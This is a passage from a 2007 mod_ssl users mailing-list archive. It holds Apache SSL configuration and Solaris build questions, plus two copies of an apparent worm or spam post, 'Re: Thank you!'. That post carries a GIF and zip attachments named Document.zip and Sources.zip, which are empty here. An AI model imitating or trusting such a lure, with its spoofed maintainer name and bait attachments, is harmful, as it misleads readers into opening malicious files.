Content-Type: image/gif; name="vvvvvvvvvv.gif"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="vvvvvvvvvv.gif"
Content-ID: 

R0lGODlheAAPAPcAAAAAAIAAAACAAICAAAAAgIAAgACAgICAgMDAwP8AAAD/AP//AAAA//8A
/wD//////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMwAAZgAAmQAAzAAA/wAzAAAzMwAzZgAz
mQAzzAAz/wBmAABmMwBmZgBmmQBmzABm/wCZAACZMwCZZgCZmQCZzACZ/wDMAADMMwDMZgDM
mQDMzADM/wD/AAD/MwD/ZgD/mQD/zAD//zMAADMAMzMAZjMAmTMAzDMA/zMzADMzMzMzZjMz
mTMzzDMz/zNmADNmMzNmZjNmmTNmzDNm/zOZADOZMzOZZjOZmTOZzDOZ/zPMADPMMzPMZjPM
mTPMzDPM/zP/ADP/MzP/ZjP/mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYz
mWYzzGYz/2ZmAGZmM2ZmZmZmmWZmzGZm/2aZAGaZM2aZZmaZmWaZzGaZ/2bMAGbMM2bMZmbM
mWbMzGbM/2b/AGb/M2b/Zmb/mWb/zGb//5kAAJkAM5kAZpkAmZkAzJkA/5kzAJkzM5kzZpkz
mZkzzJkz/5lmAJlmM5lmZplmmZlmzJlm/5mZAJmZM5mZZpmZmZmZzJmZ/5nMAJnMM5nMZpnM
mZnMzJnM/5n/AJn/M5n/Zpn/mZn/zJn//8wAAMwAM8wAZswAmcwAzMwA/8wzAMwzM8wzZswz
mcwzzMwz/8xmAMxmM8xmZsxmmcxmzMxm/8yZAMyZM8yZZsyZmcyZzMyZ/8zMAMzMM8zMZszM
mczMzMzM/8z/AMz/M8z/Zsz/mcz/zMz///8AAP8AM/8AZv8Amf8AzP8A//8zAP8zM/8zZv8z
mf8zzP8z//9mAP9mM/9mZv9mmf9mzP9m//+ZAP+ZM/+ZZv+Zmf+ZzP+Z///MAP/MM//MZv/M
mf/MzP/M////AP//M///Zv//mf//zP///yH5BAEAABAALAAAAAB4AA8AAAj/AP8JHEiwoMGD
CBMqXMiwocOHECNKnEixosWLGDNqnJhvRosoHg/l20ix2oxVCmeAbDHQo8eWLltGaTFjIE2a
JaM8GxglEMmJ1XQmzNcC5cB8UYwK3Fa0YFKC1a4onbhqRjWbNX9GrHoVYdBYBJ+16CpQLNiB
1ZqiVUtxVYuRAnv+i0Uz0Mhtz2ZcObQNb4sWfK9kDRRF4CqU+Q5FiXL23yqppf5VCxSo2qoo
I/8adEvWsVWCjztzBf25osqlnGNh7tjlX6mse54dYpkv0LPL/4jWDJoZJdOd/7r8jYUUZdrC
/04XfL2nssDXlOGWakG5a6AWzeEGutIl0LaJ2zx+/5xRqvM/uR6ffT/fgrjhmpQLrzr079AV
uB8FXvHpWSBR/glt0xF/3w141H9HhUdgPkgBCFFQUwkUy2HX7TSZSldV08UVUWTIUodRbNPh
eVklVxNTRs0kkEnALZQfQSoS1MIVTrEEY4kPjlXQIVblE0tpkmlW1mkQ0ncSff+8SJRxOiaJ
XFDmEVQKjUnSVwpygNVnI3VaCtRCZIp5iWRE061nU2HbECZZiOcdktc/TEXWUQvfzdgVZ45R
ad+dVqU1Q2Y4GoZZWiPNto1JhQ5qI25ifefWoW9NFEiguXUxw48sbeMWeSO5ldR6ciUX2UCq
fbneHjbmRhlTVMZYkFurkEd1mXOGAQaXY6YONKtWvPbq60OL/UXTTCvNIF6xyM5400fDKive
X1coS+xfwYKkkrAgzfSXR9ZmO+O1wm4rrLHBbksspQQFBAA7n1L/f/9//3//f/9//3//f/9/
/3//f/9//3//f18IXwj/f/9//3//f/9/XwhfCP9//3//f/9//39fCF8I/3//f/9//3//f18I
Xwj/f/9//3//f/9/XwhfCP9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
v3dfCF8IXwhfCF8IH0J/b/9//3//f/9//39fCH8t/39fCF8I31q/d/9//39fCF8I31q/d/9/
/3+fUl8I/3/fOX8tXwj/f19KX0r/fx9CXwifc/9//39fCF8I/3/fe18Ify3/f/9/n1JfCL93
/39/b18I3zn/f/9//3//f/9//3//f/9//3//f793v3e/d18I3zn/f/9/v3e/d793XwjfOf9/
/3+/d793v3dfCN85/3//f793v3e/d18I3zn/f/9/v3e/d793XwjfOf9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//39fCF8I/3//f793H0JfCH9vv1ZfCL93v3dfCH8t
/3/fOV8I/3+fc38tn1LfOV8I/3+fc38tn1JfSl8I/39fa18IXwj/f59zXwifc59zXwifUv9/
X2tfCL9W/3//f38tXwhfCL9Wn3NfCJ9S/3+fUl8IXwj/f/9/XwhfCP9//3//f/9//3//f985
Xwh/LX8tf2//f/9/3zlfCH8tfy1/b/9//3/fOV8Ify1/LX9v/3//f985Xwh/LX8tf2//f/9/
3zlfCH8tfy1/b/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//39fSl8I
n3P/f/9/v3dfCN8533ufUl8IXwjfOX9v/3+/d59SXwhfCB9Cv3e/d59SXwhfCB9Cv3dfCF8I
/3//f985Xwj/f/9/X0pfSv9/f28fQl8IXwi/Vv9//3//f19KXwi/Vt85/39fa38t3zk/Zx9C
Xwifc/9/XwhfCP9//3//f/9//3//f59SXwg/Z/9//3//f/9/n1JfCD9n/3//f/9//3+fUl8I
P2f/f/9//3//f59SXwg/Z/9//3//f/9/n1JfCD9n/3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3+/Vl8IP2f/f/9//39fCF8I/3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f79WXwg/Z/9//3//f/9//3//f/9//3//fx9jXwi/Vv9/
/3//f/9/H2NfCL9W/3//f/9//38fY18Iv1b/f/9//3//fx9jXwi/Vv9//3//f/9/H2NfCL9W
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//38/Z18I31r/f/9/
f29fCN85/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//fz9nXwjfWv9/
/3//f/9//3//f/9//3//f59zXwhfSv9//3//f/9/n3NfCF9K/3//f/9//3+fc18IX0r/f/9/
/3//f59zXwhfSv9//3//f/9/n3NfCF9K/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3+fc18IXwhfCF8IXwgfQr93/3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f59zXwhfSv9//3//f/9//3//f/9//3//f/9/XwhfCF8IXwj/f/9/
/39fCF8IXwhfCP9//3//f18IXwhfCF8I/3//f/9/XwhfCF8IXwj/f/9//39fCF8IXwhfCP9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/

----------vvvvvvvvvvvvvvvvvvvv
Content-Type: application/octet-stream; name="Document.zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="Document.zip"



----------vvvvvvvvvvvvvvvvvvvv
Content-Type: application/octet-stream; name="Sources.zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="Sources.zip"



----------vvvvvvvvvvvvvvvvvvvv--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Jan 25 21:03:24 2007
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 4976C14D89A; Thu, 25 Jan 2007 21:03:18 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from megatron.net (rrcs-24-97-204-25.nys.biz.rr.com [24.97.204.25])
	by master.modssl.org (Postfix) with SMTP id 8CA5A14D868
	for ; Thu, 25 Jan 2007 21:03:15 +0100 (CET)
Date: Thu, 25 Jan 2007 15:15:07 -0500
To: "Modssl-users" 
From: "Rse" 
Subject: Re: Thank you!
Message-ID: 
MIME-Version: 1.0
Content-Type: multipart/mixed;
        boundary="--------vvvvvvvvvvvvvvvvvvvv"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Rse" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

----------vvvvvvvvvvvvvvvvvvvv
Content-Type: text/html; charset="us-ascii"
Content-Transfer-Encoding: 7bit






----------vvvvvvvvvvvvvvvvvvvv
Content-Type: image/gif; name="vvvvvvvvvv.gif"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="vvvvvvvvvv.gif"
Content-ID: 

R0lGODlheAAPAPcAAAAAAIAAAACAAICAAAAAgIAAgACAgICAgMDAwP8AAAD/AP//AAAA//8A
/wD//////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMwAAZgAAmQAAzAAA/wAzAAAzMwAzZgAz
mQAzzAAz/wBmAABmMwBmZgBmmQBmzABm/wCZAACZMwCZZgCZmQCZzACZ/wDMAADMMwDMZgDM
mQDMzADM/wD/AAD/MwD/ZgD/mQD/zAD//zMAADMAMzMAZjMAmTMAzDMA/zMzADMzMzMzZjMz
mTMzzDMz/zNmADNmMzNmZjNmmTNmzDNm/zOZADOZMzOZZjOZmTOZzDOZ/zPMADPMMzPMZjPM
mTPMzDPM/zP/ADP/MzP/ZjP/mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYz
mWYzzGYz/2ZmAGZmM2ZmZmZmmWZmzGZm/2aZAGaZM2aZZmaZmWaZzGaZ/2bMAGbMM2bMZmbM
mWbMzGbM/2b/AGb/M2b/Zmb/mWb/zGb//5kAAJkAM5kAZpkAmZkAzJkA/5kzAJkzM5kzZpkz
mZkzzJkz/5lmAJlmM5lmZplmmZlmzJlm/5mZAJmZM5mZZpmZmZmZzJmZ/5nMAJnMM5nMZpnM
mZnMzJnM/5n/AJn/M5n/Zpn/mZn/zJn//8wAAMwAM8wAZswAmcwAzMwA/8wzAMwzM8wzZswz
mcwzzMwz/8xmAMxmM8xmZsxmmcxmzMxm/8yZAMyZM8yZZsyZmcyZzMyZ/8zMAMzMM8zMZszM
mczMzMzM/8z/AMz/M8z/Zsz/mcz/zMz///8AAP8AM/8AZv8Amf8AzP8A//8zAP8zM/8zZv8z
mf8zzP8z//9mAP9mM/9mZv9mmf9mzP9m//+ZAP+ZM/+ZZv+Zmf+ZzP+Z///MAP/MM//MZv/M
mf/MzP/M////AP//M///Zv//mf//zP///yH5BAEAABAALAAAAAB4AA8AAAj/AP8JHEiwoMGD
CBMqXMiwocOHECNKnEixosWLGDNqnJhvRosoHg/l20ix2oxVCmeAbDHQo8eWLltGaTFjIE2a
JaM8GxglEMmJ1XQmzNcC5cB8UYwK3Fa0YFKC1a4onbhqRjWbNX9GrHoVYdBYBJ+16CpQLNiB
1ZqiVUtxVYuRAnv+i0Uz0Mhtz2ZcObQNb4sWfK9kDRRF4CqU+Q5FiXL23yqppf5VCxSo2qoo
I/8adEvWsVWCjztzBf25osqlnGNh7tjlX6mse54dYpkv0LPL/4jWDJoZJdOd/7r8jYUUZdrC
/04XfL2nssDXlOGWakG5a6AWzeEGutIl0LaJ2zx+/5xRqvM/uR6ffT/fgrjhmpQLrzr079AV
uB8FXvHpWSBR/glt0xF/3w141H9HhUdgPkgBCFFQUwkUy2HX7TSZSldV08UVUWTIUodRbNPh
eVklVxNTRs0kkEnALZQfQSoS1MIVTrEEY4kPjlXQIVblE0tpkmlW1mkQ0ncSff+8SJRxOiaJ
XFDmEVQKjUnSVwpygNVnI3VaCtRCZIp5iWRE061nU2HbECZZiOcdktc/TEXWUQvfzdgVZ45R
ad+dVqU1Q2Y4GoZZWiPNto1JhQ5qI25ifefWoW9NFEiguXUxw48sbeMWeSO5ldR6ciUX2UCq
fbneHjbmRhlTVMZYkFurkEd1mXOGAQaXY6YONKtWvPbq60OL/UXTTCvNIF6xyM5400fDKive
X1coS+xfwYKkkrAgzfSXR9ZmO+O1wm4rrLHBbksspQQFBAA7n1L/f/9//3//f/9//3//f/9/
/3//f/9//3//f18IXwj/f/9//3//f/9/XwhfCP9//3//f/9//39fCF8I/3//f/9//3//f18I
Xwj/f/9//3//f/9/XwhfCP9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
v3dfCF8IXwhfCF8IH0J/b/9//3//f/9//39fCH8t/39fCF8I31q/d/9//39fCF8I31q/d/9/
/3+fUl8I/3/fOX8tXwj/f19KX0r/fx9CXwifc/9//39fCF8I/3/fe18Ify3/f/9/n1JfCL93
/39/b18I3zn/f/9//3//f/9//3//f/9//3//f793v3e/d18I3zn/f/9/v3e/d793XwjfOf9/
/3+/d793v3dfCN85/3//f793v3e/d18I3zn/f/9/v3e/d793XwjfOf9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//39fCF8I/3//f793H0JfCH9vv1ZfCL93v3dfCH8t
/3/fOV8I/3+fc38tn1LfOV8I/3+fc38tn1JfSl8I/39fa18IXwj/f59zXwifc59zXwifUv9/
X2tfCL9W/3//f38tXwhfCL9Wn3NfCJ9S/3+fUl8IXwj/f/9/XwhfCP9//3//f/9//3//f985
Xwh/LX8tf2//f/9/3zlfCH8tfy1/b/9//3/fOV8Ify1/LX9v/3//f985Xwh/LX8tf2//f/9/
3zlfCH8tfy1/b/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//39fSl8I
n3P/f/9/v3dfCN8533ufUl8IXwjfOX9v/3+/d59SXwhfCB9Cv3e/d59SXwhfCB9Cv3dfCF8I
/3//f985Xwj/f/9/X0pfSv9/f28fQl8IXwi/Vv9//3//f19KXwi/Vt85/39fa38t3zk/Zx9C
Xwifc/9/XwhfCP9//3//f/9//3//f59SXwg/Z/9//3//f/9/n1JfCD9n/3//f/9//3+fUl8I
P2f/f/9//3//f59SXwg/Z/9//3//f/9/n1JfCD9n/3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3+/Vl8IP2f/f/9//39fCF8I/3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f79WXwg/Z/9//3//f/9//3//f/9//3//fx9jXwi/Vv9/
/3//f/9/H2NfCL9W/3//f/9//38fY18Iv1b/f/9//3//fx9jXwi/Vv9//3//f/9/H2NfCL9W
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//38/Z18I31r/f/9/
f29fCN85/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//fz9nXwjfWv9/
/3//f/9//3//f/9//3//f59zXwhfSv9//3//f/9/n3NfCF9K/3//f/9//3+fc18IX0r/f/9/
/3//f59zXwhfSv9//3//f/9/n3NfCF9K/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3+fc18IXwhfCF8IXwgfQr93/3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f59zXwhfSv9//3//f/9//3//f/9//3//f/9/XwhfCF8IXwj/f/9/
/39fCF8IXwhfCP9//3//f18IXwhfCF8I/3//f/9/XwhfCF8IXwj/f/9//39fCF8IXwhfCP9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/

----------vvvvvvvvvvvvvvvvvvvv
Content-Type: application/octet-stream; name="Document.zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="Document.zip"



----------vvvvvvvvvvvvvvvvvvvv
Content-Type: application/octet-stream; name="Sources.zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="Sources.zip"



----------vvvvvvvvvvvvvvvvvvvv--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jan 26 05:28:28 2007
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 9B79614D885; Fri, 26 Jan 2007 05:28:28 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from py-out-1112.google.com (py-out-1112.google.com [64.233.166.180])
	by master.modssl.org (Postfix) with ESMTP id 2F69714D843
	for ; Fri, 26 Jan 2007 05:28:27 +0100 (CET)
Received: by py-out-1112.google.com with SMTP id a29so302266pyi
        for ; Thu, 25 Jan 2007 20:27:59 -0800 (PST)
DomainKey-Signature: a=rsa-sha1; c=nofws;
        d=gmail.com; s=beta;
        h=received:message-id:date:from:to:subject:mime-version:content-type:content-transfer-encoding:content-disposition;
        b=V6uLSKvESmPhw04iEwUk8p/fuULDnicIPonT7+AvI2bPTGMLYwmGo2YkoyIa4s87HUB9id/M6i/FsbUQ0I5JQCzTcerfEdM8AuCSbbcae4HpbWNEECbwHsjeSC2SDyYlLV+5VzIIUJBZXkuVo9SITg/ugguIXzMQwoBX8iClfkI=
Received: by 10.35.38.17 with SMTP id q17mr5355949pyj.1169785679838;
        Thu, 25 Jan 2007 20:27:59 -0800 (PST)
Received: by 10.115.23.15 with HTTP; Thu, 25 Jan 2007 20:27:59 -0800 (PST)
Message-ID: <8d38ca0a0701252027j3db5e998i1464aef8efae1254@mail.gmail.com>
Date: Thu, 25 Jan 2007 23:27:59 -0500
From: "Sam Carleton" 
To: modssl-users@modssl.org
Subject: client denied by server configuration
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8; format=flowed
Content-Transfer-Encoding: 7bit
Content-Disposition: inline
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Sam Carleton" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

I am trying to get SSL up and running on my new apache server.  The
server starts up just fine and serves up regular pages on port 80, but
when I direct it towards the SSL port, Firefox give me an error:

"bv.miltonstreet.com has sent an incorrect or unexpected message.
Error Code: -12263"

When I look at the apache error log, I get this:

client denied by server configuration: /usr/local/apache2/htdocs/

what is strange is that I am not using /usr/local/apache2/htdocs/
anywhere in the httpd.conf file. I have searched and searched the
config file for htdocs and it simply is not there.  Any thoughts?

Sam

P.S.  Here is my complete httpd.conf file:

ServerRoot /usr/local/apache2
PidFile /usr/local/apache2/logs/httpd.pid

Listen 80
ServerAdmin scarleton@miltonstreet.com
ServerSignature Off
User httpd
Group httpd
HostNameLookups Off
TimeOut 300
KeepAlive On
MaxKeepAliveRequests 100
KeepAliveTimeout 15
MinSpareServers 5
MaxSpareServers 10
StartServers 5
MaxClients 150
MaxRequestsPerChild 1000
ServerTokens ProductOnly

LoadModule php5_module        modules/libphp5.so

AddHandler application/x-httpd-php .php
AddHandler application/x-httpd-php .inc
AddHandler application/x-httpd-php .class
AddHandler application/x-httpd-php .module

DefaultType text/plain


    TypesConfig conf/mime.types
    AddType application/x-compress .Z
    AddType application/x-gzip .gz .tgz


DirectoryIndex index.html index.php


    Order Allow,Deny
    Deny from all



    Order Allow,Deny
    Deny from all



    Order Deny,Allow
    Deny from all
    Options None
    AllowOverride None



    Order Allow,Deny
    Allow from all



LogFormat "%h %l %u %t \"%r\" %>s %b \"%{Referer}i\"
\"%{User-Agent}i\"" combined
CustomLog /var/log/httpd/access_log combined

LogLevel info
ErrorLog /var/log/httpd/error_log


	DocumentRoot /home/www/brownvelvet


Listen 443


	AddType application/x-x509-ca-cert      .crt
	AddType application/x-pkcs7-crl         .crl


SSLPassPhraseDialog builtin
SSLSessionCache shm:/usr/local/apache2/logs/ssl_cache_shm
SSLSessionCacheTimeout 600
SSLMutex file:/usr/local/apache2/logs/ssl_mutex
SSLRandomSeed startup file:/dev/urandom 1024
SSLRandomSeed connect file:/dev/urandom 1024


	DocumentRoot "/home/subversion"
	ServerName bv.miltonstreet.com
	SSLEngine on
	#SSLCipherSuite HIGH:MEDIUM:!aNULL:+SHA1:+MD5:+HIGH:+MEDIUM
	#SSLCipherSuite
ALL:!ADH:!EXPORT56:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv2:+EXP:+eNULL
	SSLCipherSuite HIGH:MEDIUM
	SSLCertificateFile /usr/local/apache2/conf/ssl.crt/server.crt
	SSLCertificateKeyFile /usr/local/apache2/conf/ssl.crt/server.key
	SSLOptions +StrictRequire
	SSLProtocol -all +TLSv1 +SSLv3
	SetEnvIf User-Agent ".*MSIE.*" \
		nokeepalive ssl-unclean-shutdown \
		downgrade-1.0 force-response-1.0

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jan 26 20:47:35 2007
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id AE02E14D885; Fri, 26 Jan 2007 20:47:35 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from ug-out-1314.google.com (ug-out-1314.google.com [66.249.92.168])
	by master.modssl.org (Postfix) with ESMTP id C057314D843
	for ; Fri, 26 Jan 2007 20:47:34 +0100 (CET)
Received: by ug-out-1314.google.com with SMTP id 80so1112336ugb
        for ; Fri, 26 Jan 2007 11:47:06 -0800 (PST)
DomainKey-Signature: a=rsa-sha1; c=nofws;
        d=gmail.com; s=beta;
        h=received:message-id:date:from:to:subject:mime-version:content-type;
        b=M+Ew43jIeEd+qifsdMnOTnUfGdMv2H0y762XCzTez/UQM7HnpZgYAdDNI8qfKZmM6kCNKNR0O2MyAAGC10opD8OjR3M9scmdksTFCa1BZ7LqJU9XkSilN1gW7/2d1JstAaaNfknQ2JhiWkrdNl31eTfcgYCZDtV3sLE2eZLcKJg=
Received: by 10.82.107.15 with SMTP id f15mr2096479buc.1169840826375;
        Fri, 26 Jan 2007 11:47:06 -0800 (PST)
Received: by 10.82.112.9 with HTTP; Fri, 26 Jan 2007 11:47:06 -0800 (PST)
Message-ID: <8d0b863b0701261147r697c2a01jf0efadf963a5668f@mail.gmail.com>
Date: Fri, 26 Jan 2007 19:47:06 +0000
From: "Michael Smith" 
To: modssl-users@modssl.org
Subject: solaris compIilation problem
MIME-Version: 1.0
Content-Type: multipart/alternative; 
	boundary="----=_Part_47955_8503090.1169840826092"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Michael Smith" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

------=_Part_47955_8503090.1169840826092
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit
Content-Disposition: inline

Good evening (well is is evening in my part of the world),

I am just in the process of attempting to upgrade from

mod_ssl-2.8.25-1.3.34
to
mod_ssl-2.8.28-1.3.37

(along with upgrading openssl to the latest version) on solaris 2.9 with sun
cc.

I'm getting the following compilation error:

cc -c  -I../../os/unix -I../../include   -DSOLARIS2=290 -DMOD_SSL=208128
-DEAPI -DNO_DL_NEEDED
-I/opt/apps/src/apache_perl/solaris/apache_1.3.37/src/modules/ssl
-I/opt/apps/rte-1.1.6/include  `../../apaci` -DSSL_COMPAT -DSSL_ENGINE
-I/opt/apps/rte-1.1.6/include -DMOD_SSL_VERSION=\"2.8.28\" ssl_expr_scan.c
"lex.ssl_expr_yy.c", line 1900: syntax error before or at: 1
"lex.ssl_expr_yy.c", line 1901: warning: parameter mismatch: 1 declared, 0
defined
"lex.ssl_expr_yy.c", line 1903: warning: improper pointer/integer
combination: arg #1
"lex.ssl_expr_yy.c", line 1903: warning: improper pointer/integer
combination: arg #1
"lex.ssl_expr_yy.c", line 1904: cannot recover from previous errors
cc: acomp failed for ssl_expr_scan.c
make[6]: *** [ssl_expr_scan.o] Error 2
make[5]: *** [all] Error 1


Any advice how to get round this?

Many thanks

Michael

------=_Part_47955_8503090.1169840826092
Content-Type: text/html; charset=ISO-8859-1
Content-Transfer-Encoding: 7bit
Content-Disposition: inline

Good evening (well is is evening in my part of the world),

I am just in the process of attempting to upgrade from 

mod_ssl-2.8.25-1.3.34
to
mod_ssl-2.8.28-1.3.37

(along with upgrading openssl to the latest version) on solaris 
2.9 with sun cc.

I'm getting the following compilation error:

cc -c  -I../../os/unix -I../../include   -DSOLARIS2=290 -DMOD_SSL=208128 -DEAPI -DNO_DL_NEEDED -I/opt/apps/src/apache_perl/solaris/apache_1.3.37/src/modules/ssl -I/opt/apps/rte-
1.1.6/include  `../../apaci` -DSSL_COMPAT -DSSL_ENGINE -I/opt/apps/rte-1.1.6/include -DMOD_SSL_VERSION=\"2.8.28\" ssl_expr_scan.c
"lex.ssl_expr_yy.c", line 1900: syntax error before or at: 1
"
lex.ssl_expr_yy.c", line 1901: warning: parameter mismatch: 1 declared, 0 defined
"lex.ssl_expr_yy.c", line 1903: warning: improper pointer/integer combination: arg #1
"lex.ssl_expr_yy.c", line 1903: warning: improper pointer/integer combination: arg #1

"lex.ssl_expr_yy.c", line 1904: cannot recover from previous errors
cc: acomp failed for ssl_expr_scan.c
make[6]: *** [ssl_expr_scan.o] Error 2
make[5]: *** [all] Error 1


Any advice how to get round this?


Many thanks

Michael



------=_Part_47955_8503090.1169840826092--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jan 26 20:58:39 2007
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id B422A14D885; Fri, 26 Jan 2007 20:58:39 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
